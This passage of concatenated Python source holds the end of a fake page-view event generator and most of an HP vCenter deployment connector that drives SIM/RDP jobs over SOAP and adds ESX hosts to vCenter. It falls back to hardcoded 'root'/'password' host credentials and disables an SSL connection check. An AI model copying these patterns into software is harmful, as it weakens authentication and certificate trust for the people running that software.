random.randint(0, 255),
random.randint(0, 255))
document.screen_resolution = (random.randrange(340, 1080, 100), random.randrange(240, 980, 100))
if self.performance_tracker.tracker.success.per_tick % 7 == 0:
document.os = 'OSX'
document.browser = 'Safari-10'
document.language = 'en_us'
document.country = 'usa'
elif self.performance_tracker.tracker.success.per_tick % 5 == 0:
document.os = 'Linux'
document.browser = 'FireFox-40'
document.language = 'en_ca'
document.country = 'canada'
elif self.performance_tracker.tracker.success.per_tick % 3 == 0:
document.os = 'Windows'
document.browser = 'IE-60'
document.language = 'ge_de'
document.country = 'germany'
else:
document.os = 'Android'
document.browser = 'FireMini-20'
document.language = 'es'
document.country = 'eu'
document.is_page_view = True
self.publisher.publish(document.document)
self.performance_tracker.tracker.increment_success()
time.sleep(SLEEP_TIME)
except (AMQPError, IOError) as e:
self.thread_is_running = False
self.performance_tracker.cancel()
self.logger.error(f'AMQPError: {e}')
except Exception as e:
self.performance_tracker.tracker.increment_failure()
self.logger.info(f'safety fuse: {e}')
def start(self, *_):
self.main_thread = Thread(target=self._run_stream_generation)
self.main_thread.start()
def cancel(self):
self.thread_is_running = False
if __name__ == '__main__':
from constants import PROCESS_STREAM_GEN
generator = EventStreamGenerator(PROCESS_STREAM_GEN)
generator.start()
|
deployment_connector.py
|
#
# deployment_connector.py
#
# Copyright 2009 Hewlett-Packard Development Company, L.P.
#
# Hewlett-Packard and the Hewlett-Packard logo are trademarks of
# Hewlett-Packard Development Company, L.P. in the U.S. and/or other countries.
#
# Confidential computer software. Valid license from Hewlett-Packard required
# for possession, use or copying. Consistent with FAR 12.211 and 12.212,
# Commercial Computer Software, Computer Software Documentation, and Technical
# Data for Commercial Items are licensed to the U.S. Government under
# vendor's standard commercial license.
#
# Author:
# James Abendroth
# Mohammed M. Islam
#
# Description:
# AresLite deployment connector class. Connects to an RDP instance using the
# AresLite SOAP web service.
#
# mxnodesecurity -a -p dsc_rdp -c userid:pw -n <ip-address>
#
#####################################################
from util import catalog
from util.config import config, crypy
#from util import config, catalog, password
#from util.error import error
from suds.client import Client
from suds import WebFault
import suds
import suds.sax.parser
import suds.umx.basic
from logging import getLogger
from threading import Thread, Semaphore
from M2Crypto import SSL
#from vmware import VirtualCenter
#from hp.proliant.cluster import Cluster
from time import sleep
from util.resource import resource
from vmware.vcenter import vCenter, ManagedObjectRef
log = getLogger(__name__)
JOB_STATUS_MESSAGES = {
'-5': 'Job Removed',
'-4': 'Unknown',
'-3': 'Not scheduled',
'-2': 'Scheduled but not started',
'-1': 'In progress',
'0': 'Successful',
'1': 'Failed'
}
DC_STATUS_NO_SIM = 0
DC_STATUS_NO_CREDENTIALS = 1
DC_STATUS_NO_ARESLITE = 2
DC_STATUS_UNKNOWN = 3
DC_STATUS_LOGIN_FAILED = 4
DC_STATUS_INSUFFICIENT_PRIVILEGE = 5
DC_STATUS_CONNECT_FAILED = 6
DC_STATUS_DC_CREDENTIALS = 7
DC_STATUS_DEPLOYMENT_RUNNING = 8
DC_STATUS_DEPLOYMENT_FINISHED = 9
DC_STATUS_CONNECTION_LOST = 10
DC_MESSAGES = (
'HP SIM settings must be correctly configured before deployment can be used.',
'HP SIM credentials must be configured before deployment can be used.',
'The HP Deployment Connector must be installed on the HP SIM server.',
'An unknown error occurred while contacting the deployment server.',
'Deployment server login failed. Please check the HP SIM credentials.',
'The HP SIM credentials supplied do not have sufficient privileges to access the deployment server.',
'HP Insight Control for vCenter was unable to connect to HP SIM.',
'The deployment connector username and password have not been created in HP SIM.',
'Deployment is in progress.',
'The deployment process has finished.',
'Insight Control for vCenter has lost connection to the deployment server. Please check the deployment console.',
)
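# Note: DC_MESSAGES is positional and is indexed by the DC_STATUS_* constants above
# (see getDcStatus below).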
# This is a list of errors from the AresLite spec. The messages have been updated to be more user-friendly.
DC_ERRORS = {
'1020':'Insufficient privileges',
'1021':'Invalid logon token',
'1022':'Invalid session',
'1111':'Bad deployment server type',
'1112':'Bad deployment server IP address',
'1100':'No deployment server',
'1101':'Deployment server non-responsive',
'1102':'Deployment server timeout',
'1105':'Deployment server access problem',
'1106':'Deployment server returned nothing',
'1107':'Deployment server credentials not found',
'1110':'Deployment server credentials were not accepted',
'1150':'Deployment server xml format error',
'1151':'Deployment server parsing error',
'1152':'Deployment server unexpected error',
'1300':'Target system not found',
'1301':'Target system not responsive',
'1302':'Target system UUID bad',
'1307':'Target system UUID in bad format',
'1330':'Target system in wrong lifecycle state',
'1400':'Folder not found',
'1402':'An empty folder was submitted',
'1403':'Some jobs in the folder encountered a problem',
'1404':'All jobs in the folder encountered a problem',
'1550':'Bad folder ID',
'1600':'Bad personalization data',
'1601':'Personalization data was ignored by the deployment server',
'1703':'Schedule ID could not be created',
'1900':'Input parameter bad',
'1910':'Input parameter bad',
'1911':'Cannot resolve deployment server',
'2000':'Unknown error',
'2001':'Unexpected error',
'2010':'Interface not supported by access layer',
'2020':'Deployment connector doesn\'t support deployment server version'
}
ADDTOVC_NOT_STARTED = 'Not started'
RECONFIGURE_NOT_SPECIFIED = 'Reconfigure not specified'
from suds.plugin import MessagePlugin
class MyPlugin(MessagePlugin):
def sending(self, context):
#log.debug( context.envelope )
pass
def marshalled(self, context):
#log.debug("***************** marshalled Before Pruning")
#log.debug( context.envelope )
context.envelope[1].prune()
#log.debug("***************** marshalled After Pruning")
#log.debug( context.envelope )
def parsed(self, context):
#log.debug("----------------- parsed Before Pruning")
#log.debug( context.reply )
context.reply.prune()
#context.reply.getChild('dnsSuffixes').prune()
#context.reply.getChild('winsServers').prune()
#context.reply.getChild('dnsServers').prune()
#log.debug("----------------- parsed Received After Pruning")
#log.debug( context.reply )
class ALDeploymentConnector:
def __init__(self):
self._client = None
self.sk = None
self.host = None
self.deployment_sem = Semaphore(value=1)
self.monitor_sem = Semaphore(value=1)
self.failures = 0
# Deployment server type - right now all we support is "RDP"
self.ds_type = "RDP"
# Keep track of what state we are in (i.e. no SIM config, no credentials, no AL connector).
self.dc_status = None
# Items that we want to keep track of from the service. It takes a while to get information,
# so we need to cache some data locally.
self.managedNodes = []
self.jobFolders = None
# TODO: Get SIM/RDP info from config file.
#sim_cfg = config.get().sim
cfg = config()
srvcfg = cfg.get_server_config()
self.simport = srvcfg['hpsim']['port']
self.simpw = cfg.get_simpw()
if self.simpw and self.simport:
self.host = self.simpw['host']
#if sim_cfg and 'host' in sim_cfg[0]:
# self.host = sim_cfg[0].host
else:
# We can't go any further without a SIM host.
self.dc_status = DC_STATUS_NO_SIM
self._dc_error("SIM not configured.")
return
try:
# Import the WSDL and create the service.
wsdl = 'file://' + resource('Alc1_0.wsdl')
#wsdl = ALDeploymentConnector.alc_service(self.host, str(int(self.simport) + 1)) + '?wsdl'
log.debug(wsdl)
#self._client = Client(wsdl)
self._client = Client(wsdl, plugins=[MyPlugin()])
service_url = ALDeploymentConnector.alc_service(self.host, str(int(self.simport) + 1))
self._client.set_options(location=service_url)
self.login()
if self.sk:
log.info("calling discoverDeploymentServer")
self.discoverDeploymentServer()
log.info("Deployment server adapter created.")
except Exception as err:
self.dc_status = DC_STATUS_UNKNOWN
self._dc_error(err)
def getDcStatus(self):
obj = {}
# First check to see if deployment is running.
if self.deployment_running():
self.dc_status = DC_STATUS_DEPLOYMENT_RUNNING
obj['errno'] = self.dc_status
try:
obj['message'] = DC_MESSAGES[self.dc_status]
except:
obj['message'] = ''
return obj
@staticmethod
def alc_service(host, port='50001'):
return ("https://%s:%s/mxsoap/services/Alc1_0" % (host, port))
def _dc_error(self, obj):
try:
#TODO
log.error("Deployment Connector Error: %s", obj)
except:
pass
def destroy(self):
catalog.remove(self)
try:
self._client.service.logout(self.sk)
except Exception as ex:
pass
@staticmethod
def create():
def new():
dc = [x for x in catalog.get_all() if isinstance(x, ALDeploymentConnector)]
if dc:
# Don't do anything if deployment is running.
if dc[0].deployment_running():
return
dc[0].destroy()
log.info("Creating ALDeploymentConnector()")
dc = ALDeploymentConnector()
url = ALDeploymentConnector.alc_service(dc.host, dc.simport)
catalog.insert(dc, url)
t = Thread(target=new)
t.daemon = True
t.start()
# AresLite web service methods #
def discoverDeploymentServer(self):
log.info("discoverDeploymentServer(), calling getJobFolders()")
self.getJobFolders()
self.getManagedNodes()
#for node in self.managedNodes:
# self.getManagedNodeDetails(node['uuid'])
def _get_node(self, uuid):
try:
node = [x for x in self.managedNodes if x['uuid'] == uuid]
return node[0]
except:
return None
def login(self):
#TODO: SIM credentials from settings?
#entry = [x for x in config.get().sim if x.host == self.host][0]
#if (not entry.enabled):
# return
#user = entry.username or '*'
#pw = password.find(user, entry.host, password.SIM)
# TODO
cfg = config()
simpw = cfg.get_simpw()
try:
# TODO
#loginResult = self._client.service.login(pw.username, pw.password)
loginResult = self._client.service.login(simpw['username'], crypy().decode(simpw['epassword']))
if loginResult.returnCode == 0:
self.sk = loginResult.token
elif loginResult.returnCode in (1001, 1010, 1011):
self.dc_status = DC_STATUS_LOGIN_FAILED
elif loginResult.returnCode == 1020:
self.dc_status = DC_STATUS_INSUFFICIENT_PRIVILEGE
else:
self.dc_status = DC_STATUS_UNKNOWN
except Exception as ex:
# Check to see if we received a soap fault back from the service. This means that we are probably talking
# to a SIM server, but we don't have the deployment connector installed.
if hasattr(ex, 'fault'):
self.dc_status = DC_STATUS_NO_ARESLITE
self._dc_error(ex.fault.faultstring)
log.error('Unable to login to SIM due to fault: %s', ex.fault.faultstring)
return
if hasattr(ex, 'reason'):
self.dc_status = DC_STATUS_CONNECT_FAILED
self._dc_error(ex.reason)
log.error('Unable to login to SIM: %s', ex.reason)
return
log.exception('Unable to login to SIM')
self.dc_status = DC_STATUS_UNKNOWN
def _parseJobFolders(self, folders):
self.jobFolders = []
for folder in folders:
# Filter out the default RDP top-level folders. These folders cannot be run.
if folder.name in ("System Jobs", "HP Deployment Toolbox"):
continue
folder_obj = {}
folder_obj['name'] = folder.name
folder_obj['id'] = folder.id
# TODO: Saved folders need to go in the config file.
#saved_folders = config.get().rdpjobfolders
#saved_folder = [x for x in saved_folders if x['name']==folder.name]
saved_folder = None
if saved_folder:
saved_folder = saved_folder[0]
folder_obj['type'] = saved_folder['type']
else:
if folder.name.lower().find('esxi') > -1:
folder_obj['type'] = 'ESXi'
else:
folder_obj['type'] = 'ESX'
self.jobFolders.append(folder_obj)
def getJobFolders(self, refresh=False):
if self._client == None or self.sk == None:
return None
try:
if not self.jobFolders or refresh:
#import logging
#cur_level = logging.getLogger('suds').level
#logging.getLogger('suds').setLevel(10)
response = self._client.service.listFolders(self.sk, self.host, self.ds_type)
log.debug("got listFolders()")
log.debug(response)
#logging.getLogger('suds').setLevel(cur_level)
if response.returnCode == 0:
log.debug('Parsing jobFolders')
self._parseJobFolders(response.folders)
elif response.returnCode in (1021, 1022):
self.login()
return self.getJobFolders(refresh)
else:
if hasattr(response, 'errorCode'):
self._dc_error(response.errorCode)
return self.jobFolders
except WebFault as wf:
self._dc_error(wf)
return None
# This function is called from the wizard - it updates the folder types based on the user's selection.
def updateJobFolders(self, folders):
if folders:
self.jobFolders = folders
for folder in folders:
# TODO
#config.get().update_rdp_folder(folder)
pass
# Remove any config references to folders that no longer exist.
"""
for folder in config.get().rdpjobfolders:
f = [x for x in self.jobFolders if x['name'] == folder.name]
if not f:
config.get().rdpjobfolders.remove(folder)
config.save()
"""
def _parseNodeList(self, nodeList):
# Wipe out the current list so we can rebuild.
self.managedNodes = []
for node in nodeList:
entry = {}
entry['uuid'] = node.uuid
entry['name'] = node.name
entry['id'] = node.id
entry['jobs'] = []
entry['personalization'] = None
entry['overall_job_status'] = 0
entry['add_to_vcenter'] = ADDTOVC_NOT_STARTED
entry['reconfigure'] = {'id':-1, 'message':RECONFIGURE_NOT_SPECIFIED}
self.managedNodes.append(entry)
def _parseNodeDetails(self, details):
log.debug("Detail: %s", details)
node = self._get_node(details['uuid'])
log.debug(node)
if not node:
return
node['details'] = {}
node['details']['processorArchitecture'] = details.processorArchitecture
node['details']['processorCount'] = details.processorCount
node['details']['processorDescription'] = details.processorDescription
node['details']['processorSpeed'] = details.processorSpeed
node['details']['networkInterfaces'] = []
interfaces = node['details']['networkInterfaces']
try:
for netif in details.networkInterfaces:
if_details = {}
if_details['id'] = netif.id
if_details['dhcp'] = netif.dhcp
if_details['dnsDomain'] = netif.dnsDomain
if_details['ipAddress'] = netif.ipAddress
if_details['ipMask'] = netif.ipMask
if_details['macAddress'] = netif.macAddress
if getattr(netif, 'dnsServers', None):
if_details['dnsServers'] = netif.dnsServers.dnsServers
else:
if_details['dnsServers'] = []
if getattr(netif, 'gateways', None):
if_details['gateways'] = netif.gateways.gateways
else:
if_details['gateways'] = []
interfaces.append(if_details)
except:
log.error('error parsing networkInterfaces', exc_info=1)
def getManagedNodes(self, refresh=False):
if self._client == None or self.sk == None:
return None
if not self.managedNodes or refresh:
try:
result = self._client.service.listManagedNodesPerDS(self.sk, self.host, self.ds_type)
if result.returnCode == 0:
nodeList = result.nodeList
self._parseNodeList(nodeList)
for node in self.managedNodes:
self.getManagedNodeDetails(node['uuid'])
elif result.returnCode in (1021, 1022):
self.login()
return self.getManagedNodes(refresh)
else:
if hasattr(result, 'errorCode'):
self._dc_error(result.errorCode)
#if result.errorCode == 1021:
# self.dc_status = DC_STATUS_DC_CREDENTIALS
except:
log.error('error getManagedNodes', exc_info=1)
pass
return self.managedNodes
def getManagedNodeDetails(self, uuid):
if self._client == None:
return None
try:
details = self._client.service.getManagedNodeDetails(self.sk, self.host, self.ds_type, uuid)
self._parseNodeDetails(details)
return details
except Exception as ex:
log.info('exception: ', exc_info=1)
return None
# This function calls submitFolder in a way that only sends networking information and no folder name.
def reconfigure(self, uuid, personalization, os_type):
node = self._get_node(uuid)
try:
personalizationData = self._getPersonalizationXML(uuid, personalization, os_type)
result = self._client.service.submitFolder(self.sk, self.host, self.ds_type, None, uuid, None, personalizationData)
if result.returnCode == 0:
log.debug('Submitted reconfigure...')
node['reconfigure'] = {'id':result.scheduleIds[0], 'message':JOB_STATUS_MESSAGES['-1']}
# Invalid token or session. Re-login and try the call again.
elif result.returnCode in (1021, 1022):
log.debug('Error submitting reconfigure...Re-logging...')
self.login()
return self.reconfigure(uuid, personalization, os_type)
else:
log.debug('Reconfigure failed...')
node['reconfigure'] = {'id':-1, 'message':'Reconfigure failed (%d)' % (result.returnCode)}
node['overall_job_status'] = 1
return result
except WebFault as wf:
log.info('exception in reconfigure: ', exc_info=1)
node['overall_job_status'] = 1
self._dc_error(wf)
return None
def submitFolder(self, folderName, uuid):
if self._client == None:
return None
try:
result = self._client.service.submitFolder(self.sk, self.host, self.ds_type, None, uuid, folderName, None)
if result.returnCode == 0 and hasattr(result, 'scheduleIds'):
node = self._get_node(uuid)
job = {}
job['schedule_id'] = result.scheduleIds[0]
job['folder_name'] = folderName
job['finished'] = False
node['jobs'].append(job)
# Invalid token or session. Re-login and try the call again.
elif result.returnCode in (1021, 1022):
self.login()
return self.submitFolder(folderName, uuid)
return result
except WebFault as wf:
self._dc_error(wf)
return None
# Gets an XML string for the PersonalizationData parameter of the submitFolder and submitFolders calls.
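# As a rough illustration (all values below are hypothetical), a single static NIC for an
# ESX job produces personalization XML shaped like:
#   <root>
#     <computer id="42" name="node42">
#       <hostname>esx-host-01</hostname>
#       <nics>
#         <nic id="1"><dhcp>No</dhcp><ipaddress>10.0.0.5</ipaddress><mask>255.255.255.0</mask>
#           <gateway>10.0.0.1</gateway><dns>10.0.0.2</dns><dnsdomain>example.local</dnsdomain></nic>
#       </nics>
#     </computer>
#   </root>
# For ESXi jobs an <agent>no</agent> element is inserted before <hostname>.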
def _getPersonalizationXML(self, uuid, personalizationData, os_type):
px_fmt = """
<root>
<computer id="%s" name="%s">
%s
<hostname>%s</hostname>
<nics>%s</nics>
</computer>
</root>
"""
nic_fmt_static = """
<nic id="%s">
<dhcp>No</dhcp>
<ipaddress>%s</ipaddress>
<mask>%s</mask>
%s
%s
%s
</nic>
"""
nic_fmt_dhcp = """
<nic id="%s">
<dhcp>Yes</dhcp>
</nic>
"""
node = self._get_node(uuid)
if not node:
return ""
data = personalizationData
if not data:
return ""
nics = []
for nic in data['nics']:
nics.append(data['nics'][nic])
nics.sort(key=lambda a: int(a['id']))
if data['dnsdomain'] != '':
domain_str = '<dnsdomain>%s</dnsdomain>' % (data['dnsdomain'])
else:
domain_str = ''
nic_str = ""
for nic in nics:
if not nic:
continue
if nic['useDhcp']:
nic_str += nic_fmt_dhcp % (nic['id'])
else:
ip = nic['ipAddress']
netmask = nic['netmask']
if nic['gateway'] and nic['gateway'] != "":
gateway = '<gateway>'+nic['gateway']+'</gateway>'
else:
gateway = ""
if nic['dns']:
dns = '<dns>'+','.join(nic['dns'])+'</dns>'
else:
dns = ""
nic_str += nic_fmt_static % (nic['id'], ip, netmask, gateway, dns, domain_str)
agent_str = ''
if os_type == 'ESXi':
agent_str = "<agent>no</agent>"
px_str = px_fmt % (node['id'], node['name'], agent_str, data['hostname'], nic_str)
log.debug("Personalization for node %s: %s" % (uuid, px_str))
return px_str
def _parseScheduleStatus(self, status):
status_items = []
for item in status:
# Hack for bad RDP information
if item.status == -3:
item.status = -1
status_item = {}
status_item['id'] = getattr(item, 'id', '')
status_item['status'] = getattr(item, 'status', '')
status_item['error_text'] = getattr(item, 'errorText', '')
status_item['failure_mode'] = getattr(item, 'failureMode', '')
if str(item.status) in JOB_STATUS_MESSAGES:
status_item['status_message'] = JOB_STATUS_MESSAGES[str(getattr(item, 'status', ''))]
else:
status_item['status_message'] = "Unknown"
status_items.append(status_item)
return status_items
def getScheduleStatusX(self, schedule_ids):
if self._client == None:
return None
#ids = self._client.factory.create("ArrayOf_xsd_string")
#ids.value = schedule_ids
ids = [schedule_ids]
try:
result = self._client.service.getScheduleStatusX(self.sk, self.host, self.ds_type, ids)
if result and result.returnCode == 0:
return self._parseScheduleStatus(result.scheduleStatusSet)
elif result.returnCode in (1021, 1022):
self.login()
return self.getScheduleStatusX(schedule_ids)
return result
except WebFault as wf:
log.info('exception in getScheduleStatusX: ', exc_info=1)
self._dc_error(wf)
return None
def getNodeScheduleStatus(self, uuid):
status_list = []
node = self._get_node(uuid)
if not node:
return None
for job in node['jobs']:
if not 'schedule_id' in job or job['finished']:
continue
job_obj = {}
job_obj['folder_name'] = job['folder_name']
status = self.getScheduleStatusX(job['schedule_id'])
if status and isinstance(status, list):
job_obj['status'] = status[0]
status_list.append(job_obj)
# Update the job status
job['status'] = status[0]
else:
log.debug("Failed getNodeScheduleStatus: %d" % (status.returnCode))
if status.returnCode == 1701:
# Manually set the job's status to removed.
job['status']['status'] = -5
job['status']['status_message'] = JOB_STATUS_MESSAGES['-5']
job['finished'] = True
node['overall_job_status'] = 1
log.debug('Returning from getNodeScheduleStatus')
return status_list
def _getHostThumbprint(self, host, port=443, md='sha1'):
try:
ssl = SSL.Connection(SSL.Context())
ssl.postConnectionCheck = None
try:
ssl.socket.settimeout(None)
ssl.connect((host, port))
except Exception as ex:
log.exception('Unable to connect to host %s', host)
return ""
try:
fp = ssl.get_peer_cert().get_fingerprint(md)
except Exception as ex:
log.exception('Unable to get certificate and fingerprint %s', host)
ssl.close()
return ""
# Got certification without exception, now close the connection
ssl.close()
# Sometimes the leading zero is dropped which causes an Odd-length string exception.
# When this happens we'll pad the beginning of the string with a zero.
if len(fp) > 0 and len(fp) % 2 != 0:
fp = '0'+fp
# Return the fingerprint as colon separated hex digits
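# e.g. a fingerprint string 'A1B2C3' (hypothetical) comes back as 'a1:b2:c3'.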
return ':'.join(['%02x'%ord(x) for x in fp.decode('hex')])
except Exception as ex:
log.exception("Exception processing thumbprint for host %s", host)
return ""
def _getClusterMob(self, name):
vc = self._getvCenter()
clusters = vc.retreive_cluster_list()
for cluster in clusters:
try:
for prop in cluster.propSet:
if prop.name == 'name' and prop.val == name:
return cluster.obj
except:
pass
return None
def _getDatacenterMob(self, name):
vc = self._getvCenter()
datacenters = vc.retrieve_datacenter_list()
for dc in datacenters:
try:
for prop in dc.propSet:
if prop.name == 'name' and prop.val == name:
dc_host_folder = vc.retrieve_dc_host_folder(dc.obj.value)
log.debug(dc_host_folder)
return dc_host_folder
except:
log.exception('Error iterating through the propSet')
return None
def _getvCenter(self):
vc = [vc for vc in catalog.get_all() if isinstance(vc, vCenter)]
return vc and vc[0] or None
def _getHostConnectSpec(self, host, thumbprint, username=None, password=None, vc_username=None, vc_password=None):
vc = self._getvCenter()
spec = vc.client.factory.create("ns0:HostConnectSpec")
spec.userName = username
spec.password = password
spec.hostName = host
delattr(spec, 'vmFolder')
# vCenter credentials
spec.vimAccountName = vc_username
spec.vimAccountPassword = vc_password
spec.force = True
spec.sslThumbprint = thumbprint
return spec
def addHostToVCenter(self, host, uuid="", cluster="", esx_credentials=None):
isCluster = True
# TODO: Correct vCenter by UUID
#vc = [vc for vc in catalog.get_all() if isinstance(vc, VirtualCenter) and vc.uuid.lower()==uuid.lower()]
vc = self._getvCenter()
if not vc:
log.debug("vCenter instance not found. Returning None.")
return None
# First see if the user selected a cluster.
mob = self._getClusterMob(cluster)
if not mob:
log.debug("Cluster entry not found for %s. Checking for datacenter." % (cluster))
# If we didn't find a cluster, look for a datacenter entry.
mob = self._getDatacenterMob(cluster)
if not mob:
log.debug("Datacenter entry not found. Returning.")
return None
isCluster = False
thumbprint = self._getHostThumbprint(host)
if thumbprint == "":
log.debug("Failed to get SSL thumbprint from host %s" % (host))
return None
if esx_credentials == None:
# Default to root/password if the user didn't provide any credentials. These are the credentials
# for a new ESX installation (not sure if this works for ESXi).
esx_credentials = ("root", "password")
# TODO: get correct vCenter password
username = vc.decode(vc.username)
password = vc.decode(vc.password)
spec = self._getHostConnectSpec(host, thumbprint, esx_credentials[0], esx_credentials[1], username, password)
# log.debug( spec )
if not spec:
log.debug("Spec returned none. Returning.")
return None
mob = ManagedObjectRef(mob._type, mob.value)
if isCluster:
return vc.vim.AddHost_Task(mob, spec, True)
else:
return vc.vim.AddStandaloneHost_Task(mob, spec, None, True)
# Check to see if deployment is running by acquiring the semaphore.
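# The non-blocking acquire(False) only fails while begin_run_deployment/_run_deployment
# still hold deployment_sem, so a failed acquire means a deployment batch is in flight.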
def deployment_running(self):
if not self.deployment_sem.acquire(False):
return True
else:
self.deployment_sem.release()
return False
# Loops through all jobs for each node and removes them.
def clear_finished_jobs(self):
for node in self.managedNodes:
if node['jobs']:
for job in node['jobs']:
node['jobs'].remove(job)
node['add_to_vcenter'] = ADDTOVC_NOT_STARTED
node['overall_job_status'] = 0
node['reconfigure'] = {'id':-1, 'message':RECONFIGURE_NOT_SPECIFIED}
self.monitor_sem.acquire()
self.failures = 0
self.monitor_sem.release()
self.dc_status = None
# Task states: error, queued, running, success
def monitorAddHostTasks(self, tasks, uuid):
# TODO: Get the correct vCenter
vc = self._getvCenter()
if not vc:
return None
add_tasks = [task['result'].value for task in tasks]
while True:
vc_tasks = []
# Create a new collector each time around.
collector = vc.client.service.CreateCollectorForTasks(vc.sc.taskManager, None)
while True:
# Read tasks in 100 page blocks. The stupid vSphere API filtering doesn't work, so we have to just get everything.
next_tasks = vc.client.service.ReadNextTasks(collector, 100)
if not next_tasks:
break
vc_tasks = vc_tasks + next_tasks
# Get only tasks we care about.
vc_tasks = [task for task in vc_tasks if task.key in add_tasks]
has_running = False
for task in vc_tasks:
log.debug( task )
node_uuid = [t for t in tasks if t['result'].value == task.key]
if node_uuid:
node_uuid = node_uuid[0]['uuid']
node = self._get_node(node_uuid)
if task.state == 'running' or task.state == 'queued':
node['add_to_vcenter'] = 'In progress'
has_running = True
elif task.state == 'error':
node['add_to_vcenter'] = task.error.localizedMessage
elif task.state == 'success':
node['add_to_vcenter'] = 'Successful'
else:
node['add_to_vcenter'] = 'Unknown'
if not has_running:
break
else:
sleep(30)
def update_comm_loss(self):
self.monitor_sem.acquire()
self.failures += 1
self.monitor_sem.release()
log.debug("Comm loss value updated: %d" % (self.failures))
# This function combines the submitFolder and the reconfigure above. This is used so that we can run
# the two calls in serial to accommodate the ESXi behavior.
def deploy_esxi(self, uuid, folderName, deployment_obj, vcUuid):
node = self._get_node(uuid)
type = self._findJobType(folderName)
exceptionCount = 0
# For ESXi, the personalization must be sent before the deployment job is started.
if deployment_obj['personalization']:
log.debug("ESXi: Reconfiguring host %s" % (uuid))
result = self.reconfigure(uuid, deployment_obj['personalization'], type)
# Deploy the selected folder.
result = self.submitFolder(folderName, uuid)
if result and result.returnCode == 0:
# Monitor the deployment job to completion.
has_jobs = True
while has_jobs:
has_jobs = False
try:
status = self.getNodeScheduleStatus(uuid)
log.debug(status)
for status_obj in status:
status_code = status_obj['status']['status']
log.debug("Status code for node %s: %d" % (uuid, status_code))
if status_code > -1:
for job in node['jobs']:
if job['schedule_id'] == status_obj['status']['id']:
job['finished'] = True
node['overall_job_status'] = status_code
else:
has_jobs = True
except Exception as ex:
log.debug('Exception in ESXi monitoring loop: %s' % (str(ex)))
exceptionCount += 1
if exceptionCount == 5:
log.debug("Encountered too many exceptions in ESXi monitor loop. Canceling.")
self.update_comm_loss()
return
# keep the loop going to try again
has_jobs = True
if has_jobs:
log.debug("Sleeping 120 seconds.")
sleep(120)
else:
if result:
log.debug("Folder submit for %s failed. Code: %d" % (folderName, result.returnCode))
job = {}
job['schedule_id'] = -1
job['folder_name'] = folderName
job['finished'] = True
if str(result.returnCode) in DC_ERRORS:
message = DC_ERRORS[str(result.returnCode)]
else:
message = 'An unknown error occurred at the deployment server: %d' % (result.returnCode)
job['error'] = {'errno':result.returnCode, 'message':message}
node['jobs'].append(job)
else:
log.debug("Result is None for folder submit %s" % (folderName))
# Don't add to vCenter if the submitFolder process failed.
return
if node['overall_job_status'] != 0:
log.debug("Deployment failed. Exiting.")
return
# Now that the deployment job is finished, begin the add to vCenter process. For ESXi, we have to
# wait for a bit until the ESXi installation finishes. RDP tells us the process is done before it
# actually finishes. We'll try and get the thumbprint for a while until we can contact the server.
add_host_tasks = []
try:
if 'addToVCenter' in deployment_obj and deployment_obj['addToVCenter']['interface']:
interface = deployment_obj['addToVCenter']['interface']
if interface != '' and interface != 'DHCP':
log.debug("Adding to vCenter using: %s" % (interface))
if deployment_obj['addToVCenter']['username'] == "" and deployment_obj['addToVCenter']['password'] == "":
esx_credentials = None
else:
esx_credentials = (deployment_obj['addToVCenter']['username'], deployment_obj['addToVCenter']['password'])
log.debug("Credentials: %s, ************" % (deployment_obj['addToVCenter']['username']))
# Use the getThumbprint function to determine when the host is available. Try once every 5 minutes 6 times.
# (basically wait for 30 minutes for the ESXi installation to finish)
thumbprint = ''
count = 0
while thumbprint == '' and count < 6:
thumbprint = self._getHostThumbprint(interface)
if thumbprint == '':
node['add_to_vcenter'] = 'Waiting for ESXi host at %s to become available.' % interface
log.debug("Received empty thumbprint for host %s. Waiting for 5 minutes." % (uuid))
count = count + 1
sleep(60*5)
log.debug("Thumbprint for host %s after polling: %s" % (uuid, thumbprint))
if thumbprint != '':
log.debug("Before addHostToVCenter: %s, %s, %s" % (interface, vcUuid, deployment_obj['addToVCenter']['cluster_name']))
result = self.addHostToVCenter(interface, vcUuid, deployment_obj['addToVCenter']['cluster_name'], esx_credentials)
if result and result._type == 'Task':
add_host_tasks.append({'uuid':uuid, 'result':result})
else:
log.debug("Result: %s" % str(result))
node['add_to_vcenter'] = 'Error adding host %s to vCenter. The vCenter server did not start the task. The host must be added manually.' % (interface)
else:
log.debug("Thumbprint not found. Unable to add host to vCenter.")
node['add_to_vcenter'] = 'Unable to contact the host at %s. Add to vCenter aborted.' % (interface)
else:
log.debug("Invalid interface for node %s: %s" % (uuid, interface))
if interface == 'DHCP':
node['add_to_vcenter'] = 'An interface configured for DHCP was specified. This host must be added to vCenter manually.'
else:
node['add_to_vcenter'] = 'No valid interface found. Add to vCenter aborted.'
else:
node['add_to_vcenter'] = 'No interface specified to add to vCenter.'
except Exception as ex:
node['add_to_vcenter'] = 'An error occurred while attempting to add host %s to vCenter. See the log for details.' % (interface)
log.exception("Exception while attempting vCenter add: %s" % (str(ex)))
raise ex
# Monitor each of the add host tasks that were just started.
self.monitorAddHostTasks(add_host_tasks, vcUuid)
# Handles the ESX deployment process for a single node.
def deploy_esx(self, uuid, folderName, deployment_obj, vcUuid):
node = self._get_node(uuid)
type = self._findJobType(folderName)
exceptionCount = 0
result = self.submitFolder(folderName, uuid)
if result and result.returnCode == 0:
# Monitor the deployment job to completion.
has_jobs = True
while has_jobs:
has_jobs = False
# Check to make sure that our main loop hasn't found a connection problem.
if self.dc_status == DC_STATUS_CONNECTION_LOST:
log.debug("Connection lost - exiting ESX deployment thread.")
return
try:
status = self.getNodeScheduleStatus(uuid)
for status_obj in status:
status_code = status_obj['status']['status']
log.debug("Status code for node %s: %d" % (uuid, status_code))
if status_code > -1:
for job in node['jobs']:
if job['schedule_id'] == status_obj['status']['id']:
job['finished'] = True
node['overall_job_status'] = status_code
else:
has_jobs = True
except Exception as ex:
log.debug('Exception in ESX monitoring loop: %s' % (str(ex)))
exceptionCount += 1
if exceptionCount == 5:
log.debug("Encountered too many exceptions in ESX monitor loop. Canceling.")
return
# keep the loop going to try again
has_jobs = True
if has_jobs:
log.debug("Sleeping 120 seconds.")
sleep(120)
else:
if result:
log.debug("Folder submit for %s failed. Code: %d" % (folderName, result.returnCode))
job = {}
job['schedule_id'] = -1
job['folder_name'] = folderName
job['finished'] = True
if str(result.returnCode) in DC_ERRORS:
message = DC_ERRORS[str(result.returnCode)]
else:
message = 'An unknown error occurred at the deployment server: %d' % (result.returnCode)
job['error'] = {'errno':result.returnCode, 'message':message}
node['jobs'].append(job)
else:
log.debug("Result is None for folder submit %s" % (folderName))
# Don't add to vCenter if the submitFolder process failed.
return
if node['overall_job_status'] != 0:
log.debug("Deployment failed. Exiting.")
return
try:
